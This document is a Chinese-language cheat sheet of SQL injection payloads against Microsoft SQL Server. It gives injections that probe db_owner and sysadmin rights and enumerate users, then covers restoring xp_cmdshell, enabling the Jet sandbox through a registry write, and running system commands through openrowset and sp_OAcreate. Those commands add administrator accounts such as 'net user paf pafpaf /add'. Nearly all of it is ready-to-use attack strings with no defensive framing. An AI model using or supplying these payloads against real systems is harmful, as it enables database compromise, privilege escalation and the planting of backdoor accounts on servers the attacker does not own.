//看看是什么权限的 
and 1=(Select IS_MEMBER('db_owner')) 
And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;-- 

//检测是否有读取某数据库的权限 
and 1= (Select HAS_DBACCESS('master')) 
And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 -- 


数字类型 
and char(124)%2Buser%2Bchar(124)=0 

字符类型 
' and char(124)%2Buser%2Bchar(124)=0 and ''=' 

搜索类型 
' and char(124)%2Buser%2Bchar(124)=0 and '%'=' 

爆用户名 
and user>0 
' and user>0 and ''=' 

检测是否为SA权限 
and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- 
And char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 -- 

检测是不是MSSQL数据库 
and exists (select * from sysobjects);-- 

检测是否支持多行 
;declare @d int;-- 

恢复 xp_cmdshell 
;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';-- 


select * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version') 

//----------------------- 
// 执行命令 
//----------------------- 
首先开启沙盘模式： 
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1 

然后利用jet.oledb执行系统命令 
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")') 

执行命令 
;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';-- 

EXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111' 

判断xp_cmdshell扩展存储过程是否存在： 
http://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell') 

写注册表 
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1